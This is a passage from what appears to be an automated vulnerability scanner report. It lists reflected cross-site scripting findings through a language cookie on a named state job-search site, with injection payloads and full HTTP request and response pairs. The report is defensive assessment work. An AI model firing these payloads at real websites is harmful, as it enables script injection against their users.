PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en17dbd"><img src=a onerror=alert(1)>abbcf0f134a">
...[SNIP]...

3.190. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d0cc"%3balert(1)//58328ab40e9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 3d0cc";alert(1)//58328ab40e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en3d0cc"%3balert(1)//58328ab40e9; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN3D0CC";ALERT(1)//58328AB40E9\">
...[SNIP]...

3.191. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6398b"><img src=a onerror=alert(1)>ba3c68b365f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6398b"><img%20src%3da%20onerror%3dalert(1)>ba3c68b365f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en6398b"><img src=a onerror=alert(1)>ba3c68b365f">
...[SNIP]...

3.192. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as acbaa"><img src=a onerror=alert(1)>ae5b7c5d919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enacbaa"><img%20src%3da%20onerror%3dalert(1)>ae5b7c5d919; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:31 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enacbaa"><img src=a onerror=alert(1)>ae5b7c5d919">
...[SNIP]...

3.193. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d941"%3balert(1)//bf7542d8709 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 4d941";alert(1)//bf7542d8709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en4d941"%3balert(1)//bf7542d8709; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:39 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN4D941";ALERT(1)//BF7542D8709\">
...[SNIP]...

3.194. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/favicon.ico

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a13a7"%3balert(1)//00ccd787efa was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as a13a7";alert(1)//00ccd787efa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=ena13a7"%3balert(1)//00ccd787efa

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENA13A7";ALERT(1)//00CCD787EFA\">
...[SNIP]...

3.195. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/favicon.ico

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b71"><img%20src%3da%20onerror%3dalert(1)>4f618c7f396 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 73b71"><img src=a onerror=alert(1)>4f618c7f396 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en73b71"><img%20src%3da%20onerror%3dalert(1)>4f618c7f396

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:46 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en73b71"><img src=a onerror=alert(1)>4f618c7f396">
...[SNIP]...

3.196. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/default.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8806"%3balert(1)//e2594ad7f76 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b8806";alert(1)//e2594ad7f76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enb8806"%3balert(1)//e2594ad7f76; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:17 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8806";ALERT(1)//E2594AD7F76\">
...[SNIP]...

3.197. https://www.vermontjoblink.com/ada/default.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/default.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b78"><img%20src%3da%20onerror%3dalert(1)>26d42412b51 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 60b78"><img src=a onerror=alert(1)>26d42412b51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en60b78"><img%20src%3da%20onerror%3dalert(1)>26d42412b51; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
